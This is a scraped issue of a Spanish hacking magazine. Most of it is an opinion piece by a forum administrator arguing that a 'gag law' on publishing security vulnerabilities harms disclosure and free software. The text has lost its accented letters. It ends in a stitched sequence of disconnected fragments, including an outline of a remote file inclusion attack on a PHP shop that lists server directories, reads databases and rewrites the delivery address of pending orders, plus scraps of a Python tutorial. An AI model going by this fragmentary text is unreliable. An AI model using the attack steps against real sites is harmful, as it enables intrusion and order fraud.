para proteger datos... no estamos todos
en peligro? Si no hay informacin, si nadie
demuestra pblicamente la deficiencia de
ciertos productos... cmo podemos saber
si lo que compramos cumple con unos
mnimos de calidad?
Si anulamos el derecho a informar, si
ponemos mordazas jurdicas a quienes
investigan y estudian la calidad de los
productos... Qu tipo de sociedad estamos
creando? ... quiz tengamos que creer a
guillermito... quiz terminaremos vivien
do en una sociedad-Disneylandia donde
los preciosos panfletos de publicidad sern
64
la innegable realidad.
Deseamos vivir en esa Disney-Sociedad?
Por supuesto que no. Me niego a pensar
que los poderes que deben defender al
ciudadano, la Ley, se ponga de parte de
la ignorancia. Me niego a pensar que
hemos vuelto a la Edad Media y que nues
tro rey (el estado) y su voz (la Ley) han
decidido sumir al pueblo en la ignorancia
y la podredumbre de ideas.
La historia demuestra, de forma contun
dente, que la ignorancia siempre conduce
a la injusticia, a la corrupcin, a la
degradacin del ser humano como tal y
finalmente, al retroceso del conjunto de
la sociedad. Y cuando digo el conjunto
de la sociedad, me refiero a la sociedad
global, tanto a las personas de a pie
como a los gobiernos en s mismo... la
pobreza de ideas provoca que la evolucin
se detenga y, en caso de no invertir el
proceso, retroceda.
Esta situacin es bastante absurda. Cual
quier producto tiene un control de calidad...
por qu se impiden los controles de
calidad en productos tecnolgicos? Muy
al contrario, se deberan propiciar las
investigaciones independientes... y una
vez ms... otros pases nos han tomado
la delantera.
En Estados Unidos (por poner un ejemplo)
esta ley no tiene equivalente, muy al
contrario, las personas que demuestran
gran habilidad en la investigacin son muy
buscadas por las empresas, porque el
talento no puede ser desaprovechado,
debe ser potenciado... hace tiempo que
Europa parece haber tomado el camino
contrario. No, seores, no... la ignorancia
no es el camino correcto.
Esta situacin nos afecta a todos. Recor
demos las palabras de Carlos Almeida
Cualquier medio informativo, electrnico
o en papel, se va a ver afectado por la
nueva regulacin. Cualquier sitio Web que
informe sobre vulnerabilidades, mediante
informacin tcnica relativa a la seguridad
informtica, o que mediante links dirija a
sitios de Internet donde se ofrezca dicha
informacin, puede verse acusado
Esta revista trata directamente y en pro
fundidad aspectos tcnicos de la seguridad
informtica y, precisamente por ello, nos
hemos sentido atemorizados por la ley
mordaza. Ahora mismo estamos expues
tos a una condena por los contenidos que
tienes en la mano, hablar de Seguridad
Informtica es delito en Espaa.
Seremos nosotros los primeros condena
dos en Espaa por ejercer el derecho de

Informar?
Te aseguro que este mes hemos tenido
serias dudas sobre si debamos o no pu
blicar los artculos que tienes delante de
ti, nos hemos sentido amenazados y ate
morizados por la evolucin de las ltimas
leyes y los resultados de las mismas en
otros pases. Pero no es ya slo esta
revista, todas las revistas, incluidas PC
World o PC Actual o @rroba contienen
referencias a los ltimos virus, agujeros
de seguridad y en definitiva cualquier tema
del inters del lector. Somos delincuentes?
Y las Webs? Se empezarn a perseguir
las cientos de miles de Webs que contienen
informacin sobre seguridad informtica?
La verdad es que no, nadie en su sano
juicio iniciara una cruzada de este tipo,
pero eso es lo de menos... con que se
juzguen y condenen a unos pocos, es ms
que suficiente para que el resto seamos
ms cautos y nos autocensuremos... y
ese es el verdadero peligro de esta ley
tan ambigua, provocar que uno se lo
piense muy bien antes de abrir la boca y
publicar ciertas informaciones de forma
abierta.
Y este es el problema REAL de la ley
mordaza: SU PROFUNDA AMBIGEDAD.
Es tan poco concreta, tan irresponsable
mente imprecisa, tan fcilmente tergiver
sable que es ms que suficiente para
provocar condenas en Espaa y permitir
que el miedo se infiltre en la sociedad.
Seamos realistas, no es el gusto de nadie
ponerse en peligro de ser condenado
por escribir unas palabras y publicarlas.
Ese temor lo hemos sentido nosotros, lo
hemos tocado, lo hemos saboreado y a
punto ha estado de tener consecuencias.
Si nosotros hemos sentido esa inseguri
dad... Qu puede llegar sentir una persona
cualquiera que tiene una Web personal en
la que se tratan temas de Seguridad In
formtica?
Para no caer en el desnimo y dejar una
puerta abierta a la esperanza, tengamos
presente un fragmento de un artculo
publicado recientemente por David Bravo,
conocido abogado que lucha por la
defensa de los internautas.
Si el juez se acogiera a las ms elemen
tales normas de interpretacin de los
preceptos penales, concluira que informar
sobre
vulnerabilidades
no
conlleva necesariamente estimulacin
alguna, del mismo modo que decir que el
cianuro causa la muerte no es una

invitacin al suicidio. Si yo digo que un
determinado tipo de cuchillo sirve para
cortar eficazmente la carne
nicamente me limito a describir una
realidad ejerciendo mi derecho a la
libertad de informacin. Despus lo que
haga Ted Bundy con el cuchillo es
cosa suya. Es cierto que no todos los
jueces cumplen escrupulosamente estos
principios, pero tambin lo es que algunos
han justificado abusos sexuales
porque la vctima sola llevar minifalda al
t ra b a j o y n o p o r e s o p e n s a m o s
que esa sea la interpretacin correcta de
l a l e y. P r e v e r a t e n t a d o s a
derechos constitucionales a causa de la
ambigedad de la ley debe ser
precisamente un estmulo para recordar
y afirmar con rotundidad que los
seguimos teniendo y no para llorar pre
maturamente su prdida.
Cerramos aqu la parte formal del artculo
de opinin y nos soltamos el pelo. La
intencin de esta primera parte era dar
un argumento absolutamente irrebatible
sobre el tema principal (el derecho a
informar sin temor a represalias). Lo que
leers a continuacin son las posibles
consecuencias de la Ley mordaza y puede
tener varias lneas de contraargumentacin... y por eso es un artculo
de opinin, para que sea debatido, por
ejemplo, en el foro de Hackxcrack. Hay
un hilo abierto que precisamente trata el
caso Guillermito:
http://www.hackxcrack.com/phpBB2/vie
wtopic.php?t=18335 :)
Intentar no ser alarmista y, por supuesto,
no llegar al anarquismo dialctico; pero
no pienso reprimir mi inquietud ante esta
situacin. Quiz no sea conveniente que
leas lo que viene a continuacin, te adver
timos que es perjudicial para tu (nuestra)
cmoda vida.
Nosotros, el pueblo, la plebe, difcilmente
nos damos cuenta de los cambios en las
leyes hasta que ya es demasiado tarde.
No importa que algunos colectivos poco
representativos (sin poder meditico) nos
avisen, nos adviertan, nos pidan firmas y
pongan el grito en el cielo... las leyes son
muy aburridas... quien las entiende?...
que hagan lo que quieran, total, mi opinin
no cuenta.
Bien... inteligente posicin, seguro que
TU y YO hemos cado mil veces en esta
trampa, la trampa de pensar: ---y que
puedo hacer yo? Total, por mucho que yo

patalee, no va a cambiar nada--As que, nos quedamos tan tranquilos sin
hacer nada :(
El problema es que nosotros somos per
sonas normales y no llegamos ni a imagi
narnos las consecuencias de esta ley...
hasta que nos toca... claro... hasta que
un buen da te llega a casa una citacin
judicial de una gran compaa y te das
cuenta que aquella ley te dice que eres
un delincuente.
Qu ha pasado? Pero si la ley no pareca
afectarme a mi... por qu me denuncian
a mi?!!! Qu he hecho? !!
La ley mordaza implica que la publicacin
en cualquier medio (una Web, un peridico,
un libro, una revista e incluso un mail) de
informacin relativa a la seguridad infor
mtica es constituyente de delito. Una
simple mencin a un agujero de seguridad,
detallar tcnicamente dicho agujero y/o
explicar el mtodo de intrusin para que
sea comprendido y uno pueda protegerse
puede ser considerado delito.
Perfecto. Con esta ley, Espaa se acaba
de cargar incluso la Web Oficial de Micro
soft. Microsoft tiene en su Web miles de
explicaciones tcnicas relacionadas con
sus agujeros de seguridad, incluso provee
al mundo entero las herramientas necesa
rias para detectar esos fallos y explotarlos.
Este humilde redactor tiene en su PC un
programa que Microsoft aconsejaba des
cargar desde su Web Oficial (e instalar)
para testear los agujeros de seguridad.
Desde aqu, rogara a la fiscala que actuase
de oficio y denunciase a Microsoft... son
unos delincuentes desde el punto de vista
de la ley Espaola.
te, ese tipo de investigacin tambin puede

ser constituyente de delito, puesto que
ests en posesin y utilizando medios (ya
sea software o hardware) que te permiten
explotar agujeros de seguridad e inves
tigar sobre los mismos.
Quieres ms? No tienes suficiente? Pues
ahora viene lo bueno...
Tal como remarca Carlos Almeida, esta
ley viene a situar fuera de la Ley a la
mayor parte de la poblacin espaola. O
sea que, cualquier gran empresa puede
denunciarnos (a ti y a mi) e incluso puede
conseguir que nos condenen. Las empre
sas no son tontas, no empezarn a denun
ciar a cientos de miles de personas, pero
SI a unas pocas... con eso bastar para
atemorizar.
Quien peor lo tiene, con diferencia, es el
software libre. Por ejemplo, nuestro foro
en la Web est programado en PHP y es
libre. Puedes descargarlo gratuitamente
de www.phpbb.com... est programado
para disfrute de quien quiera utilizarlo y
una alternativa parecida en software de
pago implicara desembolsar unos 800
euros. Los lectores de esta humilde revista
no podran tener un foro tan potente,
imposible a esos precios.
Pero... por qu lo tiene muy mal el soft
ware libre?, en qu le afecta la ley? Pues
como lo hemos vivido en nuestras propias
carnes, te lo explico muy claramente.
Pero hay ms. Si eres por ejemplo, admi

nistrador de redes, NO se te ocurra enviar
un mail a otros administradores sobre
cmo defenderse de un agujero de segu
ridad... eso es delito... como tcnico NO
PUEDES dar datos tcnicos sobre seguridad
informtica a otros tcnicos. NO puedes,
eso es delito segn la ley especifica per
fectamente en su punto 3.
Hace unos das se public un BUG que

afectaba a este foro, durante unas horas
estuvimos desprotegidos ante un ataque
que podra haber sido LETAL... hablamos
de que un atacante podra haber entrado
como administrador y eliminado el foro
completo. OHHHH!!!
Pero como todava estamos en un mundo
libre, ese bug tan importante fue anunciado
pblicamente, y gracias a ello los adminis
tradores nos avisamos unos a otros y,
gracias a dios, nos protegimos antes de
que un posible atacante nos volatilizase...
y no puedo seguir escribiendo sin mostrarle
mi agradecimiento a quien nos avis pri
mero,
el
administrador
de
www.elhacker.net.(ver imagen 1)
Y no se te ocurra testear tu sistema para

ver si algn agujero de seguridad te est
dejando indefenso ante un posible atacan
Recomiendo enrgicamente que visites su

Web y, desde aqu, en nombre de la revista
y en nombre de todos los miembros, mo
65
Imagen 1
d e ra d o r e s y a d m i n i s t ra d o r e s d e
www.hackxcrack.com, te damos MIL Y MIL
GRACIAS por tu tica. Y enviamos un
fuerte abrazo a todos los que visitan con
asiduidad tu Web y a todos los que partic
ipan en ella con su tiempo y esfuerzo -> elhacker.net forever ;)
espus de ser pblicamente conocido el bug,
en la Web oficial del foro phpbb
www.phpbb.com) fuimos informados y
pusieron un parche para descargar y poder
actualizar nuestro foro en hackxcrack.
Incluso inmediatamente que fue pblica
mente conocido el bug, ya haban mil sitios
que te enseaban a protegerlo cambiando
a mano una simple lnea de cdigo. Pues
bien, con LEY MORDAZA, todos los impli
cados estamos fuera de la ley. Y yo el
primero, porque declaro pblicamente me
diante este escrito que investigu el bug,
la forma de protegerme de l y transmit

pblicamente esa informacin a muchas
personas y administradores de otros
foros... vendr el juez a buscarme?... hom
bre... pues aqu te espero sentado en mi
casa. A ver si hay suerte, el fiscal me
denuncia, salgo en la tele y hago propa
ganda gratis a la revista :P Venga, que ya
acabo mi lnea anarquista, aguntame unas
lneas ms. El software libre es precisamente
el ms rpido en protegerse (actualizarse)
ante un agujero de seguridad, mil veces
ms rpido que cualquier compaa multimil
lonaria. Son miles las personas que cuando
descubren un bug lo anuncian y depende
ya de la agilidad de los programadores
poner a disposicin de los usuarios el parche
correspondiente. Con la ley mordaza, adis
a esta posibilidad, se perdera este dina
mismo y se daara de forma irreversible
su calidad.Y llegamos a la guinda final, el
trfico de informacin, la mafia informativa.Si
TU y yo NO podemos acceder con normal
idad a la informacin relacionada con la
seguridad informtica, te aseguro que esa
informacin seguira en Internet, pero ser
tratada en grupos reducidos (ocultos),
hacindonos a muchos delincuentes por el
mero hecho de TRAFICAR con esa infor
macin. Y de todo hay en este querido
mundo nuestro... gente buena y gente
mala... te imaginas el dao irreparable que
significara no enterarte de un bug hasta
pasados 6 meses desde su aparicin?... y,
Atencin al Cliente
Telfono de Atencin al Cliente:
977 22 45 80
Persona de Contacto:
Srta. Genoveva
Peticin de nmeros atrasados y suscripciones
Servicio Ofrecido de Lunes a Viernes

De 9:30 A 13:30
66
para colmo, te aseguro que esa informacin

valdra mucho dinero... bienvenido al trfico
de informacin. Y seamos un poco malos...
venga... anmate, piensa un poco... quien
tendra dinero para comprar esa informacin?
... Pues te aseguro que el software libre
NO... pues eso... las empresas impor
tantes, multinacionales y toda la pesca. Y
si yo tengo una empresa de software
millonaria y quiero quitar de en medio a
mi competencia libre... pues con esa in
formacin y un programador suelto un
gusano que fulmina por completo la cred
ibilidad de ese software libre(mi compe
tencia) que reduce mis ventas.paranoia?
Si cae en tus manos un buen libro de
artes empresariales, ya me contars. En el
mundo actual (en la esquina de tu calle)
hay guerras y hay muertos, pero esta
guerra no tiene bombas y los muertos no
sangran... cada da las empresas luchan a
muerte por sobrevivir y te aseguro que
las hay perfectamente entrenadas para
ELIMINAR a la competencia.Esta ley intenta
ponernos las cadenas de la ignorancia,
negarnos a la plebe el derecho a investigar
y compartir nuestros conocimientos. Yo
no pido mucho, simplemente quiero poder
vivir tranquilo, sin miedos a leyes ab
surdas... Yo no soy un delincuente... Y
tu?Gracias por leerme y aguantarme. Un
abrazo a todos!!!AZIMUT, administrador
del foro de www.hackxcrack.com

HXC 28

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

HXC 28

Загружено:

Авторское право:

Доступные форматы

00028

Moleman, a.k.a Hctor M. ---> moleman.bofh@gma l.com

El cuarto cambio y caminando en la direccin de hacer HXC lo ms abierto

P.D: Los artculos publicados este mes han precisado de

Copyright Editotrans S.L.

1- Trazando el esquema de ataque

suelo, se lo dejaremos a Tom Cruise, nosotros vamos a in

mos resultados, auditaremos cada uno de

Como podemos ver seccion es una va

Visualizaremos las bases de da

Alteraremos la tabla y finaliza

La sentencia include de PHP permite por

notaramos diferencia alguna que acce

2.1 Diseando los scripts para la

2.1.2 Usando funciones de php

Script que muestra el listado de un di

Para visualizar el contenido de un archivo:

while ($archivo = readdir($directorio))

2.1.1 Usando funciones de

El problema de estas funciones es que

El script abre el directorio actual, lee

Obtendramos como salida el listado del

en el directorio raz los archivos dir.php

El contenido del archivo db.php es el

3.1 Infiltrndonos en el servidor

3.1.1 Visualizando las bases de da

dor, para ello tendremos que conectar

Excelente, hemos obtenido las bases de

3.1.2 Visualizando las tablas de la

Las tablas que contiene la base de datos

3.1.3 Visualizando la estructura de

Esto se consigue ejecutando la

pedidos pendientes, procedamos a la

3.1.4 Visualizando los pedidos del

3.1.5 Modificando la direccin del

UPDATE pedidos pendientes SET lu

case 'contacto': include("contacto.html"); break;

Gracias a su infiltracin hemos

4.1 Por parte del programador de la

te funciones como file exists() y trata

4.2 Por parte del administrador del

El cdigo PHP que ejecutemos a

Para este caso verificaramos que la va

travs de RFI se ejecutar con

Por Moleman (a.k.a Hctor M.)

En el anterior artculo comente que nos quedaban unos

Ya comentamos las cadenas. Una cadena es simplemente

los mtodos y funciones asociados a las

Tambin indicar que podemos acceder a

Una lista en un conjunto de datos de

Los elementos se enumeran empezando

Una tupla es a todos los efectos lo mis

(con una pequea excepcin que co

Pensemos en un diccionario de InglsEspaol. Buscas una palabra en ingls y

hacer con l lo que queramos. Fcil,

Crear ahora nuestros propios mdulos

Creamos la funcin y luego simplemen

Quizs os preguntis porque hasta el

A veces nos interesa que un programa

Se imprime la lista entera (entre cor

La lista que almacena los argumentos

Lleg el tan ansiado momento. Espero

Si lo ejecutamos con argumentos: